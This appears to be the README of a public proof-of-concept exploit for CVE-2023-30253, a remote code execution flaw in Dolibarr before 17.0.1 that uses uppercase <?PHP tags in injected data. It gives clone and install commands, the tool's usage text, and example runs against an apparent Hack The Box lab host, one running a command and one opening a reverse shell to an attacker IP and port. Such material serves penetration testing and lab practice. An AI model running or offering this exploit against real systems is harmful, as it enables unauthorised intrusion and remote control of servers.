Dolibarr before 17.0.1 allows remote code execution by an authenticated user via an uppercase manipulation: <?PHP instead of <?php in injected data.
git clone https://github.com/Rubikcuv5/cve-2023-30253.git
pip3 install -r requirements.txt
python3 CVE-2023-30253.py -h
usage: CVE-2023-30253.py [-h] [--url URL] [-u USER] [-p PASSWORD] (-c COMMAND | -r ip port)
Argument parser
options:
-h, --help show this help message and exit
--url URL URL of the website
-u USER, --user USER Username
-p PASSWORD, --password PASSWORD
Password
-c COMMAND, --command COMMAND
Command to execute
-r ip port, --reverseshell ip port
Reverse shell IP and port
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -c "ls -l"
python3 CVE-2023-30253.py --url http://crm.board.htb -u admin -p admin -r 10.10.14.17 4444